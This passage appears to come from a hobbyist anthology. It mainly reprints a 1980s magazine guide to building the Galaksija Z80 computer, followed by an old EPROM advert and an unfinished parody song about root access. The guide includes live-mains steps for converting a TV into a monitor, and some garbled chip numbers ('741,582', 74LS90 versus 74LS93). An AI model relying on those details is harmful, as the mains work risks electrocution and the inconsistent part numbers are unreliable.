of very high quality, and that sometimes means it 
costs more than the chip itself. 





Connection to the outside world: Connectors and pin layout on the back of the “Galaksija” (expansion 
connector; cassette “EAR” and “MIC” jacks; ground and supply voltages from the rectifier; monitor output) 


PIN LAYOUT ON THE CONNECTOR 

 1 N.C.    12 GND           23 D0    34 A3 
 2 N.C.    13 GND           24 D1    35 A4 
 3 N.C.    14 GND           25 D2    36 A5 
 4 N.C.    15 GND           26 D3    37 A10 
 5 GND     16 [illegible]   27 D4    38 A9 
 6 GND     17 A15           28 D5    39 A8 
 7 GND     18 A14           29 D6    40 A7 
 8 GND     19 IORQ-         30 D7    41 A6 
 9 GND     20 M1-           31 A0    42 A12 
10 GND     21 MREQ-         32 A1    43 A13 
11 GND     22 GND           33 A2    44 A11 





Double print: The expansion connector in the form of a printed circuit 
The heart of the “Galaksija” computer: the Z80A microprocessor and the 2732 EPROM with the BASIC interpreter 
1. Before us is the material that we gathered with so much effort, from 
which in a few hours a “Galaksija” computer will “grow”. At the bot- 
tom of the picture we easily recognize the keys and key caps with im- 
printed markings; on the right are the resistors (all rated 1/8 W, though 
higher-rated resistors can also be used), on the left the capacitors, 
and in the middle the chips (integrated circuits). Special attention 
should be paid to the MOS and CMOS chips. 


2. Since the printed circuit board is single-sided, we will need quite 
a few jumpers. These are easiest to make from the solid copper wire 
pulled out of the popular blue-and-white telephone “pair” wire. A help- 
ful circumstance is that the lengths are standardized at 5, 10, 20, 30 
and 40 mm, so it is easy to cut a tool for bending them precisely (when 
making this simple tool, take the wire diameter into account). 
3. We begin assembling the computer by placing the first jumper, carefully following the assembly diagram. Some jumpers pass under chips; this will cause no trouble if the jumpers are bent neatly and lie flat against the board. Attention! This is the view from the component side and not, as it might appear, from the track side!




4. When we turn the board over to solder the first jumper, it becomes clear why assembly starts with the lowest components. Had we, for instance, started with the key switches, all the lower components would fall out during later soldering. If you have never soldered, it is a good idea to experiment a little first on some other board. The tip of the soldering iron should be well shaped with a file, cleaned and tinned. Soldering is done by bringing the solder wire to the joint from one side and the well-heated tip of the iron from the other. Take care not to leave too much solder on the joint: paradoxical as it may sound, otherwise we get a bad electrical contact.


















5. All the jumpers are placed and soldered. Let us count them carefully: there should be exactly 119. If one is missing on your board, you will have to consult the assembly diagram again. Note the 74LS32 chip: as we said in the introduction, it can be replaced by a jumper (the dashed line on the assembly diagram) if we do not want to expand the system through the connector. That will then be the 120th jumper.





6. The next stage is mounting the resistors, which is in many ways similar to mounting 10 mm jumpers.
7. When mounting the chips, which comes next, pay exceptional attention to orientation, because even experienced professionals sometimes put a chip in backwards. Some chips are marked with a semicircular notch, as on the assembly diagram, others with an engraved dot next to pin 1. Note that the lettering on a chip is not always oriented so that it starts at pin 1. Since the component layout will be printed on the top side of the Galaksija's board, there should be no trouble here.





8. The chips are in place, but not all of them: for now the MOS and CMOS chips already mentioned, CD4017, CD4040, 6116, 2716, 2732 and Z80A, are left out. It is best to leave them for last, but there is no reason not to fit their sockets. Now, before soldering, is the moment to check once more that every chip is in its place and correctly oriented. It is no accident that we repeat this advice: any impatience or carelessness during assembly is paid for dearly at the moment of first power-on.





9. Soldering the chips is a particularly delicate job, because the pin spacing is only 2.54 mm, and a track often runs between the pins. If through carelessness an unwanted solder bridge is made, we remove it by melting some more (fresh!) solder on the same spot and then lifting all of it off in a single drop on the tip of the iron.





10. The capacitors are next in height, so let us mount them too. It is best to use so-called disc capacitors, since they are the smallest and cheapest, but if they are hard to obtain, use whatever you have. The capacitance of all the capacitors marked with the letter C is not critical, and their breakdown voltage even less so. Capacitor C5 we will not mount yet. Most likely it will not even be needed if we have a suitable crystal. When we get to commissioning there will be more about this.


11. There are also two low-power NPN transistors, one each by the left and right edges of the board. With a little attention we will not go wrong when mounting them: looking at a transistor from below, we see that its leads are arranged as if at the corners of a right isosceles triangle. The holes for the transistor on the board are arranged the same way. In the upper left corner of the board there is also one small diode. Most often the cathode (the end nearer the centre of the board) is marked with a ring around the cylindrical body.





12. The excitement is certainly rising: we have reached the keyboard. Whether we cut the mask ourselves from glass-fibre laminate or aluminium sheet according to our drawing (something we would not recommend even to our worst enemy), or ordered it and received it together with the keys, we need it: without it each key would wobble on its own, and the caps would probably rub against each other. The mask is self-supporting, so it is not fastened to the board anywhere.










13. First we place a few key switches in the edge openings of the mask, for now without caps, and then solder them so that the mask stands stably. Make sure the keys are not upside down: the assembly diagram shows the leads facing us. The jumpers will not be in the way, because they are placed exactly between the keys. From here it goes easily: there are 55 keys in total and they are all the same.

14. Since the work with the soldering iron is at an end, we will now solder in, or place in their sockets, the MOS and CMOS chips. Attention: these chips are very sensitive to static electricity. It is definitely worth studying the article "Dangerous curves" first.

15. Click, click, click! The keycaps are in their places, and now the whole thing is taking on a serious shape. It almost tempts us to start writing a program. But patience, patience.

16. We will notice that one keycap (marked RET and ENTER, which is the same thing) is twice as wide as the others. It is mounted on two key switches. If we look carefully at the traces on the board, we will see that the contacts of those two switches are connected in parallel. So only one switch has a function; the other is there purely for mechanical reasons.
17. The choice of plugs ("jacks") we leave to you. You can use whatever you have, as long as they have at least three poles. It seems to us that standard five-pin DIN plugs are perfectly usable: they are easy to obtain (Ei makes them), they are not expensive and, wonder of wonders, they are very reliable. Since they have five contacts, we suggest the pin assignment given on the assembly diagram. A good property of this arrangement is that accidentally swapping the plugs will not cause a disaster.





18. Since a multi-pole connector is not exactly easy to find here, we have adapted the board so that several different types of connector can be fitted, as long as they have the standard 2.54 mm pitch. As the most convenient solution we chose to add another small double-sided board, designed so that a ribbon cable with a 44-pin "EDGE" connector can be attached to it, because that type is the easiest to obtain and its price is affordable.
19. Of course, we will now, as is done in production, carry out a final inspection of the whole board: we shine a strong light through the board from close up and, from the solder side, examine every line very carefully. Miniature solder "bridges" are a common occurrence. Look at the circled part of the picture: on our own board we found a not-so-small solder bridge which had formed, who knows how, in such a wide gap between two traces.





20. Our effort is rewarded with this fine sight: a clean, tidy printed circuit board in a device that will repay us many times over for the effort and patience invested. The Galaksija will work for you better than many other electronic devices in this century of electronics, displaying a property we meet for the first time in a machine: it will communicate with us in such a way that we get the impression it has become a member of the family. Indeed, it is not unusual for many people to regard their computer as a friend.


10.2 Read this too: Dangerous curves

If you have plenty of built devices behind you (and ones that worked, at that), you will certainly not follow all our instructions to the letter. Still, there are rules you must not break, because doing so would certainly cause permanent damage to components. We list the most important ones.


• A short circuit between the positive and negative supply lines of the computer will damage the 7805 regulator. Some manufacturers build automatic current limiting into this chip, but do not put it to the test. Likewise, accidentally swapping the positive and negative leads from the power supply to the computer will quite certainly be fatal for all the chips.


• Almost all the chips in the Galaksija run on a supply voltage of +5 V, with a permitted deviation of ±0.25 V. The integrated circuits will survive transients up to 7 V; exceeding that voltage is dangerous.


• Shorting any output of a TTL circuit (the chips of the 74LS... series) to the positive supply line will permanently damage that circuit. Shorting an output to ground is harmless, and we may use it freely when experimenting. Here one must only take care that a larger number of outputs of the same chip are not shorted to ground at the same time.


• If the picture on the monitor does not synchronise well, we will experiment with different values of resistors R12, R13, R9 and R10. There is no danger as long as R12 and R13 are not lower than 330 ohms, and R10 is not lower than 40 ohms.


• Connecting the monitor output (without an RF modulator) to a TV receiver with a "hot chassis" is dangerous not only for the chips but for your life. Because of its great importance we have devoted a separate text to this topic, "A simple operation, fantastic effects".


• Since MOS and CMOS chips are very sensitive to static electricity, they must be handled carefully. Trusting that most builders are already familiar with the technique of working with these chips (in the Galaksija they are CD4017, CD4040, 2716, 2732, 6116 and Z80A), we give only a few basic tips:
• It is preferable to use a grounded soldering iron. If we do not have one, an ordinary iron will do if we wind a few turns of copper wire around the cooler end of its metal part (nearer the hand) and connect the other end of the wire to the earth contact of a Schuko wall socket.


• If the room we work in has a synthetic carpet, the static potential of our body with respect to earth can reach as much as 300 volts! This does not endanger us much, because the charge will "drain" in a very short time when we touch some grounded object, but if it drains through the pin of a MOS or CMOS chip it will probably make the chip unusable. That is why such chips are kept in so-called anti-static tubes, or may be pushed pin-first into special conductive foam, or simply wrapped in aluminium foil.


• Our chips will be completely safe during soldering if we make a few more turns of bare wire around the part of the iron we hold in our hand and connect the other end of the wire to a grounded metal part. In that way we too, since we come into contact with the chip, are at the same potential.


• Once a chip is installed it is no longer so much at risk, so after assembly is finished we can drop all these precautions.


10.3 Making the computer's case: The finishing touch

The mechanical design of the case we leave to you, but we will offer one idea: since there is enough copper around the edge of the main printed circuit board, the sides can be cut from the same kind of glass-fibre laminate and simply soldered to the board carrying the components. The printed circuit board thus becomes the mechanical foundation of the whole case, for which the laminate satisfies even the strictest mechanical requirements.
1. We carefully plan the dimensions of every part of the case on paper. We must know exactly which side overlaps which at the joints. The parts are cut easily and precisely with the popular OLFA knife, by scoring the line on both sides of the board. After that, if the grooves are deep enough, it is easy to snap the board along the scored line. After cutting in this way the edges should be finished with a fine file. Edges that will be soldered are finished flat, free edges rounded.

2. First we must mark, and clean with a hard eraser or fine sandpaper, all the joint surfaces we are going to solder. Then we heat a 24 or 30 W soldering iron well and tin the cleaned surfaces. It will be easier if we also use soldering paste.












3. Before soldering the whole joint, we tack the side at only a few points. That way we can carefully check it and make any corrections. Bear in mind that once a side of the case has been soldered it is practically impossible to desolder it without damage.








4. When soldering the sides, take into account the shrinkage of the tin-lead alloy as it cools: if we want a right angle, we set the boards at an obtuse angle (seen from the side being soldered; in the picture that is the lower side), because after soldering the solder will "pull" the boards towards each other. In that way we get a right angle after cooling.

5. After a strict check of the relative position and angle, we solder the whole joint between the two surfaces. It will probably be necessary, every few centimetres, to wait for the cooled tip of the iron to heat up again. Perhaps this problem would be solved by a somewhat more powerful iron, but that is a slightly dangerous solution: overheated copper peels off the laminate.


6. To the inner surface of the lid we solder a few strips about 10 mm high, which can be adjusted to fit tightly inside the sides of the case. So no special fastening of the lid to the case is needed.







7. To make the lid more resistant to bending, we also solder one strip of laminate across the middle. All that remains is the bottom of the case, which we can make from any material that does not conduct electricity. We prefer a sheet of plexiglass about 4 mm thick, fastened to the main board with four M3 screws with lock nuts, or with standoffs for joining two surfaces at a distance.










8. If you want to paint the case and mark it with all the necessary legends, here too we can help with good advice. There is a procedure that has all the good properties of screen printing, gives aesthetically good results, is very durable mechanically, and can easily be carried out under amateur conditions. We need to prepare two cans of automotive spray paint (best one white and the other darker, say medium blue, number 469), a bottle of cleaning benzine, and Lithoset rub-down lettering and possibly lines.





9. It is essential to sand the whole surface we are going to paint with fine sandpaper. Nowhere may it remain glossy, because paint would quickly flake off such spots. We then clean it well and degrease it with benzine.





10. We spray the surface evenly with the lighter colour (best white). It will be useful to study the instructions on the spray can. This layer should dry for at least three hours, but not in cold or damp air.


11. With the Lithoset letters we write all the necessary text over the just-dried surface. If we also draw lines around the edge of the case and around the keyboard opening, we get a nicer appearance. With a clean, dry finger we press each letter to be sure it is well stuck down.

12. We carefully spray all of this over with the darker colour. This layer should be as even and as thin as possible, just enough that the white does not show through.

13. After about an hour of drying (not much longer!), we carefully scratch off the letters and lines with a fingernail. After this stage the lid may look somewhat imprecise and untidy. For now, pay no attention to that.

14. When we put a little cleaning benzine on a clean cloth or paper tissue and rub the surface, we will be surprised by the very handsome appearance of the letters and lines.


10.4 You cannot do without this: The rectifier and voltage regulator for the power supply

[Figure: Electrical schematic of the rectifier. Outputs labelled: +11 V; +12 V stabilised; +5 V stabilised; ground.]

[Figure: Assembly diagram of the rectifier. The transformer label is only partly legible.]

[Figure: Printed circuit board of the rectifier.]

Parts list for the rectifier (the scan is partly illegible; values are given as far as they can be read)

Resistor
  R1            1k
Capacitors
  (value partly illegible) ...00 to 6800 µF, min. 16 V
  (value illegible), min. 16 V
  100 µF, min. 16 V
  100 to 220 nF, min. 400 V
Diodes
  1N5400 / 1N5408
  1N4001 (second entry illegible)
  Zener diode BZ 12
Integrated circuit
  regulator 7805
Transformer
  2 × 9 V, min. 6 W (the scan could also be read as 2 × 7 V; 9 V is the value consistent with the roughly 11 V quoted on C1 below)
Let us say right away that the stabilised 12 V is used only to power the RF modulator, and you can leave it out if you are not fitting a modulator or have one that runs from 5 V. That would save components D3, D4, D5, C4, C5 and R1. Capacitor C6 on the primary side of the mains transformer serves to suppress unwanted interference that might arrive from the mains. The rectifier is full-wave, and about 11 V of rectified and filtered voltage appears on the electrolytic capacitor C1. The integrated 7805 regulator provides about 1 A at 5 V. It is a good idea to use a transformer that can supply that current too, even though the computer draws only about 0.4 A; let the rest serve to power any later expansions. Capacitors C2 and C3 protect the 7805 against oscillation. Since the 7805 gives off a great deal of heat in operation, it must be mounted on a heat sink. If we do not have a factory-made one, we can make it from three pieces of aluminium sheet of 35×80, 35×110 and 35×140 mm, each bent sharply in two places into a U shape. The hole in the regulator's metal tab takes an M3 screw, with which it is clamped firmly to the heat sink. Before mounting it is advisable to coat the contact surface of the regulator with a little silicone paste for better heat transfer. No mica insulators are needed: the tab of the 7805 is internally tied to its ground pin, so a bare heat sink simply sits at supply ground, and it must not be allowed to touch anything at another potential. Choose for yourself what sort of box to mount this rectifier and transformer in. It should have ventilation openings, and if it is metal, the mains must be brought in by a three-core cable with a Schuko plug. The yellow-green wire of the cable is connected at one end to the earth contact of the Schuko plug, and at the other to the metal box and to the negative pole of the rectifier.


10.5 A simple operation, fantastic effects


To turn an ordinary black-and-white television into a monitor we must respect one important limitation: a video input can be added only to a television that has a mains transformer. TV receivers with a "hot chassis" are very dangerous to modify, because they are galvanically connected to the computer and so endanger the life of whoever is working at it. How do you check whether your television has a hot chassis? If you do not have enough experience and background knowledge, give the job up or leave it to an expert. If you are sure of your knowledge, open the television and plug it into the mains (this is what, according to the manufacturer's instructions, "you must never do"), without touching any of its metal parts. Measure the potential of the television's chassis with respect to earth. Pull the mains plug, turn it through 180 degrees and repeat the measurement. If in either case you read any voltage at all, close the television and abandon any further modification; the solution to your problem is called an RF modulator. If in neither case did you register a voltage, you may continue checking. The resistance between either pole of the television's mains connector and the chassis must be infinite (measured, of course, with the power off). If this check too gives a positive result, you have the "green light" for the modification. First obtain the schematic of your TV receiver; working without it makes no sense. Find the input to the first stage of the video amplifier. The voltage of the so-called "white level" is marked there, and sync is 2 volts below it. Transistorised TV receivers most often have the "white level" at +3 V and sync at +1 V. Leaving the bias from the divider connected to the base of the transistor, disconnect the lead that brings the signal from the video detector and connect it as in our figure. You need to add one bipolar electrolytic capacitor of about 50 µF or, since bipolar electrolytics are hard to find, two 100 µF electrolytics connected back to back (positive poles towards each other, the negative poles going to the socket and to the switch that selects the television's function, so we do not give up the TV receiver either). In the back panel of the television drill an opening for mounting the switch and the video-signal socket. For the wiring it is good to use the shortest possible leads, which should if possible be screened, or at least have their pairs twisted, one wire spiralled around the other. The same recommendation applies to the cable connecting the computer and the new monitor. With that the modification is complete. Close the television and connect it to the computer. When you switch them on, some adjustment of the horizontal and vertical sync will probably be needed, as well as setting the television to the strongest contrast at which the letters do not yet "smear".


[Figure: The divider circuit for the television. Labels legible in the scan: two 100 µF capacitors; from the video detector; TV input, 75 ohm; switch S2; bias; added components.]


10.6 First power-on: Don't panic, everything will be fine

[Figure: Assembly diagram of the logic probe.]

[Figure: Electrical schematic of the logic probe. Label legible in the scan: input tip.]

Parts list for the logic probe
Resistors
  (values illegible in the scan)
Capacitor
  C1            100 nF
Diodes
  L1 to L6      LEDs (6 pcs)
Integrated circuits
  74LS04
  74LS93

First plug in only the power supply. Measure the voltages: the stabilised 5 V must not deviate by more than ±0.25 V. For the 12 V (the voltage needed by some RF modulators) the deviation may be as much as ±1 V. Having satisfied yourself that the voltages are within limits, connect the grounds of the power supply and the computer with a piece of wire, set the meter to its widest current range, then touch the positive probe of the meter to the +5 V output of the supply and the negative probe to the +5 V input of the computer. The meter should show a current between 300 and 500 mA. If the reading is within these limits, take the meter off the +5 V and repeat the same with the +12 V. Depending on the type of RF modulator used (it is the only thing fed by the current we are measuring), the deflection should be a few milliamps, so to register it we must switch the meter to a lower range. If all is well, remove the meter, connect the monitor through the video input (or a TV receiver through the aerial socket), connect the supply to the computer and switch it on. If we are using the RF signal and a TV receiver, we go through the television's tuning scale on all three bands to find where reception is best. The computer will write the first word of its life: "READY".


10.6.1 What matters is that it works, not that it works first time


If the computer does not work "first time", do not let panic take hold: passing difficulties are an integral part of amateur work. If there is a picture but it is unstable, try adjusting the vertical and horizontal sync of the TV receiver or monitor (the controls are on the back of the set; on some televisions they have to be adjusted with a screwdriver). If nothing at all is visible on the screen, turn up the brightness. Perhaps, instead of one picture, nine small ones now appear (three rows of three), with black borders and no text. This phenomenon is not hard to cure: the crystal is oscillating at three times its frequency instead of at 6.144 MHz. It is enough to fit capacitor C5, with a capacitance between 10 and 30 pF. To add it, as for any other modification, the computer must be disconnected from the mains. If the computer is completely silent, cautiously touch every component with a finger, especially the ICs. The regulator's heat sink should already be warm after a few minutes of operation, and the rectifier diodes and mains transformer slightly so. Of the chips, the microprocessor may warm up moderately (not so much that we cannot keep a finger on it!), as may the EPROMs. If something is overheated, at least we know where to look for the short circuit.


10.6.2 Hidden faults and capricious errors


It is possible, of course, that the fault is so well "hidden" that it has not shown itself yet. In that case it is quite possible that there is a short somewhere on the printed circuit. Switch off the power supply, take a multimeter (AVO meter) and, on the Ω×1 range, patiently test all adjacent tracks. While doing so, check whether some chip pin has perhaps been left unsoldered, then turn the board over and recheck the correctness of the component layout. There is also the possibility that the computer works, but with some specific defects: when, say, you press a key, two letters appear instead of one. In that case a short has almost certainly occurred on the lines from the chips 74LS251 and 74LS156 (they sit next to each other) to the keyboard. If you record the situation and work out which pairs of letters appear together, you will be able, by looking at the arrangement of the keys in the matrix (on the schematic), to determine exactly which lines are shorted. It is possible that the lines of text on the screen are skewed horizontally, especially in the last rows. That indicates a mismatch in the picture synchronization signal, so you will need to experiment with changing the resistance of R9 and R10 (R9 must not be less than 40 ohms, otherwise the chip 74LS38 will be endangered).
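The "which pairs of letters appear together" reasoning above, worked through in code as an added example (not from the article): the 4×4 key matrix is constructed and is not the Galaksija's 74LS156/74LS251 wiring, and the observed letter pairs are made-up symptoms. The method is the one described: a bridge between two column lines makes every key in one column also register the key in the same row of the other column, a bridge between two row lines does the same for columns, and a single bridged pair must explain every observed pair at once.

```python
"""Infer shorted keyboard-matrix lines from "two letters per keypress" symptoms.

Added example, not from the original article. MATRIX is a constructed 4x4
layout (row lines R0..R3 from a decoder, column lines C0..C3 into a
multiplexer), not the Galaksija's actual key matrix.
"""
from itertools import combinations

MATRIX = [
    "ABCD",
    "EFGH",
    "IJKL",
    "MNOP",
]


def key_position(key):
    """Return (row, col) of a key in MATRIX."""
    for r, row in enumerate(MATRIX):
        if key in row:
            return r, row.index(key)
    raise KeyError(key)


def predicted_pairs(short):
    """Letter pairs that a given bridged line pair ("row"|"col", a, b) makes appear together."""
    kind, a, b = short
    if kind == "col":                       # same row, the two bridged columns
        return [(row[a], row[b]) for row in MATRIX]
    return list(zip(MATRIX[a], MATRIX[b]))  # same column, the two bridged rows


def candidate_shorts(observed_pairs):
    """Bridged line pairs that explain every observed pair of co-appearing letters.

    Returns a set of ("row", a, b) / ("col", a, b) tuples with a < b. An empty
    set means one bridged pair cannot explain the observations (more than one
    fault, or the symptom is not a matrix short at all).
    """
    rows, cols = range(len(MATRIX)), range(len(MATRIX[0]))
    candidates = {("row",) + pair for pair in combinations(rows, 2)}
    candidates |= {("col",) + pair for pair in combinations(cols, 2)}
    for k1, k2 in observed_pairs:
        (r1, c1), (r2, c2) = key_position(k1), key_position(k2)
        if r1 == r2:        # keys share a row: only a column-to-column bridge explains it
            explains = {("col",) + tuple(sorted((c1, c2)))}
        elif c1 == c2:      # keys share a column: only a row-to-row bridge explains it
            explains = {("row",) + tuple(sorted((r1, r2)))}
        else:               # diagonal pair: no single bridged line pair produces it
            explains = set()
        candidates &= explains
    return candidates


if __name__ == "__main__":
    # Constructed observation: pressing A also prints B, pressing E also prints F.
    print(candidate_shorts([("A", "B"), ("E", "F")]))   # {('col', 0, 1)}
```

Once the probable short is known, predicted_pairs() lists every other key that should show the same doubling, which is a quick way to confirm the diagnosis before reaching for the soldering iron.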


10.6.3 A tool for stubborn faults


For especially "stubborn" faults one auxiliary tool should be built: it is called a logic probe and can be useful on many other occasions too. It needs two chips, a 74LS04 and a 74LS90, six LEDs, one capacitor and a few resistors. With this probe we can determine whether the logic level on one of the lines is high (the first LED lights), low (the second LED) or whether there are pulse trains (then the remaining four LEDs do not show a static situation but flicker, usually so fast that we get the impression that all four are lit; a static situation, without a pulse train, can never light all four LEDs). It is best for the probe's ground and supply to be two differently colored flexible wires about 50 cm long ending in "crocodile clips". With them we bring a stabilized 5 V from somewhere on the device under test (it need not be only the "Galaksija" computer), minding the polarity; a mistake can damage the probe. Then, touching characteristic points with the probe's sharpened tip, we read off the logic states. First we make sure that the oscillator is running. Pin 10 of chip 741,582 must show an alternating signal, which means that all the LEDs are lit. Next we follow the divider chain: pin 2 of the 74LS93, pin 14 of the CD4040, pin 2 of the CD4017. Each of these points shows the same state on the probe, except the last, where the frequency is low enough for us to notice some LEDs flickering. If there is a static state somewhere, we have found the fault. Carefully check the surrounding tracks: if there is no fault there, we will have to replace the chip. Pin 26 of the microprocessor must show a low logic level for about half a second after power-on and then constantly high. If that is not so, check the transistor connected to that pin and the electrolytic capacitor that connects R5 to +5 V.


10.6.4 Others may know more


If even after all these operations you have not found the fault, you will have to seek the help of an expert. It seems to us that that path is simpler than starting to learn electronics. There is, finally, one problem that is solved purely in software: if the picture on your monitor (television) is shifted too far to the left, every time you switch on the computer you will have to type BYTE 11176,12 and press (RET) (in a more extreme case use the command BYTE 11176,13). Similarly, if the picture is shifted to the right, you can type BYTE 11176,10 (or even BYTE 11176,9) and press (RET) every time you switch on the computer.





Text: Voja Antonić. Drawings: Mirjana Antonić. Photographs: Ivan Ivanov.


10.7 Obtaining Parts for the "Galaksija" Computer: Components and How to Get Them


Building a computer yourself, even in places where microprocessors are bought "by the kilo", is not an entirely simple matter. Some key parts of the computer, such as the ROM, are not on open sale anywhere in the world, and others, such as the keyboard, are obtained neither cheaply nor easily. In our country, such an adventure may look completely mad. It turns out, however, that even such an obstacle can be overcome. How?

Thanks to the understanding and love of computers of a handful of domestic manufacturers, "Galaksija" has managed to secure for the readers of this edition at least those components without which building the computer would be a truly suicidal act (the ROM, the keyboard and the printed circuit board), and at prices considerably below market! (The printed circuit board will cost hobbyists 40 percent less than it costs "Elektronika Inženjering", even though they pay sales tax and an enterprise does not!). In addition, we have managed to put together a fairly favorable arrangement for obtaining the semiconductor components from abroad. At this moment only the computer's case and the demonstration cassette are in question. The sliding exchange rate of the dinar raises the price of everything, and it has raised the price of the "Galaksija" computer too. The final price depends on the way the chips are obtained from abroad. In the least favorable case, if the customs officers do not turn a blind eye to the few chips that make up a "Galaksija", it should not exceed 15,500 dinars (set of mechanical parts = 4600, set of chips = 6500, customs duty 3250, case and passive components = 1200 dinars), but it cannot be less than 11,000 dinars.


10.7.1 Mechanical components


The mechanical components of the "Galaksija" computer (the printed circuit board, the connector board, the key mask and the keys with caps) are provided by the Institut za vakuumsku tehniku from Ljubljana (the keys) and the firms MIPRO and Elektronika from Buje (everything else). The keys that will be fitted in the "Galaksija" computer meet all professional standards; the very same ones are fitted in the terminals of several domestic computer systems. The printed circuit board (of glass-fiber laminate, naturally!) also has a professional look and quality. The tracks are protected first by galvanic plating and then by so-called solder resist (that green paint to which professional boards owe most of their charm). The component layout is printed on the top side. Such quality makes assembling the computer considerably easier: the chance of placing a component wrongly or of carelessly making a solder bridge between tracks is reduced to a theoretical minimum. The price of the set is 4300 dinars and is set so as to cover production and postage costs as well as sales tax, which takes almost a third of the sum! (The price does not include the connector board, which is expected to cost no more than 300 dinars.) Such a popular price represents the support of the firms MIPRO and Elektronika from Buje and their owners Zvonko Juras and Blaž Krakić for "Galaksija"'s campaign to spread the idea of home computers. Unfortunately, such a favorable price comes with certain restrictions, which should not worry those who decide in time to build the "Galaksija" computer. The price is valid only until 31 January for order forms that arrive through the "Galaksija" editorial office. MIPRO and Elektronika will accept orders after that deadline too, but will deliver at economic (that is, considerably higher) prices. The parts, moreover (to the regret of owners of the ZX Spectrum and ZX81), can only be ordered as a complete set. For a hundred readers the set of mechanical components will be delivered at a special discount for 3660! Which hundred? The first to send in order forms, on 5 January and after! Why the fifth? Because this special edition does not reach all the kiosks at the same time. We simply want all readers to be on an equal footing! Delivery starts on 15 January. Orders should be sent to the address: "Galaksija", 11000 Beograd, Bulevar vojvode Mišića 17.
10.7.2 Integrated circuits


Nothing, presumably, worries potential "Galaksija" builders as much as obtaining the integrated circuits. Unfortunately, they can only be bought abroad. There are indeed plenty of reasons for concern: how to reconcile the order with the strict customs regulations, how to explain in an unfamiliar language what you actually need, how to make the payment? The procedure is basically simple: write to the foreign firm and ask for a pro forma invoice. When the invoice arrives, take it to the bank to make the payment, the so-called foreign currency remittance. Everyone who has been through it, however, knows how hard that road is. Unfortunately, there is no other. Never lose sight of one thing: the maximum value of one shipment must not exceed 1500 dinars, otherwise it will be returned and will never reach you. To simplify the procedure at least a little, "Galaksija" has made an arrangement with the firm "Microtechnica" from Graz. The price of the set of integrated circuits, RF modulator, crystal and three sockets is 1000 schillings (about 6500 dinars) for the 4 K RAM version (two 6116 chips), or 1116 schillings for the 6 K RAM version (three 6116 chips). Postage is included in the price. Delivery will be made fully in accordance with our customs regulations. To place an order, it is enough to request (in Serbo-Croatian) a pro forma invoice for "Galaksija" computer parts. Payment can also be made with one of the following credit cards: American Express, Diners, Eurocard and Visa. For all buyers of the "Galaksija" chip set, "Microtechnica" will program the EPROMs free of charge. That considerably shortens the procedure and speeds up the road to a "Galaksija" computer. Orders should be sent to the address: "MICROTECHNICA", A-8042 GRAZ, ST. PETER HAUPTSTRASSE 10, AUSTRIA. We also publish the addresses of two good distributors from England (AMBIT INTERNATIONAL, 200 NORTH SERVICE ROAD, BRENTWOOD, ESSEX, ENGLAND) and Germany (BÜRKLIN, SCHILLERSTRASSE 40, 8000 MÜNCHEN).


10.7.3 Programming the EPROMs


Without the system programs that must be written into the EPROMs 2732 (ROM) and 2716 (character generator), the "Galaksija" computer is completely helpless. Readers who order the parts set from "Microtechnica" will receive programmed EPROMs, completely ready to be fitted. Readers who have already obtained EPROMs, or intend to obtain them through some other distributor, should send them to the editorial office for programming before fitting them. The service is completely free and will be performed by the Belgrade firm MIPRO (not a mistake: there are two firms called MIPRO and both are taking part in our campaign!), where the development of the "Galaksija" computer began. You can start sending EPROMs immediately; they will be returned to you within fifteen days. Put enough postage stamps for the return letter into the parcel, as many as you had to stick on it to send it to us. So ask about the tariff at your post office before sending. An insured letter is the safest way for the EPROMs to reach the editorial office safely and to get back to you. EPROMs should be sent to the address: "Galaksija", 11000 Beograd, Bulevar vojvode Mišića 17.


10.7.4 Are the preliminary order forms valid?


The preliminary order form for the keyboard and printed circuit board that we published in the magazine "Galaksija" was meant to help us estimate precisely the interest in building the "Galaksija" computer (and prepare adequately for the whole campaign), but we cannot deliver on the basis of those. We therefore ask you to send us the enclosed order form, regardless of whether you have already sent the preliminary order form from "Galaksija" or not. We will deliver only on the basis of the enclosed order form.


Voja Antonić (in the back) and his friend Jova Regasek assembling Galaksija
10.7.5 Emergency help


Inexperienced builders need not fear that they will be left alone if they get stuck somewhere while assembling the "Galaksija" computer. In cooperation with the radio club "Avala" from Belgrade we have organized an emergency help service that will be on duty every day from 17:00 to 20:00 on telephone 011/402-687. With this club we will also organize free courses in assembling the computer. You will find more detailed information in the February "Galaksija", in any case before you manage to collect all the parts.





ORDER FORM

I hereby irrevocably order the set of parts for the "Galaksija" computer (54 keys, caps with the corresponding markings, the aluminum key mask and the printed circuit board) at the price of 4300 dinars. The price does not include the printed connector, which will also be delivered. The total sum is expected not to exceed 4600 dinars.

I will pay the postman on receipt of the parcel.
Texas Instruments MOS EPROMs: even more affordable.

TMS 2708 now $21.50*. The industry standard.
TMS 27L08 now $26.15*. The low power 8K.
TMS 2716 now $36.90*. The 2708 times two.
*100-piece prices

Remember a few months ago when EPROMs were expensive and hard to get? Due to TI's leadership they have become available microcomputer building blocks.

Prices have dropped dramatically; availability is excellent. Credit TI's high-yield, high-volume production.

TI's highly cost effective EPROMs feature a rugged, high-integrity ceramic package with sturdy gold-plated pins to withstand the repeated handling and insertions associated with reprogramming. And a gold-alloy-sealed lid for superior hermeticity.

TI offers a choice of three production EPROMs, all from stock.

• TMS 2708. The industry standard 8K EPROM. Fully TTL compatible.
• TMS 27L08. The industry first low power 8K EPROM fully compatible with the 2708. But less than one-half the power dissipation and 10% power supply tolerance.
• TMS 2716. A 2708 times two. Twice the memory (16K) in the same space. An economical plug-in upgrade for 2708s. And TI's 16K 2716 uses less power than a single 2708.

To order the affordable EPROMs, call your nearest authorized TI distributor listed to the left.

TEXAS INSTRUMENTS INCORPORATED
©1977 Texas Instruments Incorporated
zines that teach cs concepts via cute drawings!
shop.bubblesort.io 
11 Root Rights are a Grrl's Best Friend


by foz 


The trolls are glad to lie for views
They delight in online duels.
But I prefer a man page that describes extensive tools.

A shell on the sys may be quite continental
But root rights are a grrl's best friend.
sudo may be grand, but it won't pay the rental
On your hosting fee, or help you with the disassembly.
RAM gets cold as exploits get sold
And we all mine bitcoin in the end.
But exploit or shell script, priv escalation keeps its shape!
Root rights are a grrl's best friend!

There may come a time when a hacker needs a lawyer,
But root rights are a grrl's best friend.
There may come a time when a tech firm employer
Offers you stock options
But get root rights and your own machines.
Perks will fly when stocks are high,
But beware when they start to descend.
Machines will go offline and no more command line!
Root rights are a grrl's best friend!

I've heard of servers where you get admin accounts,
But root rights are a grrl's best friend.
And I think that machines that you admin yourself
Are better bets. If nothing else, big data sets!
Unix time rolls on, entropy is gone,
And you can't get that file to prepend.
But big racks or botnets you get props for root logins!

Root rights, root rights, I don't mean jail breaks,
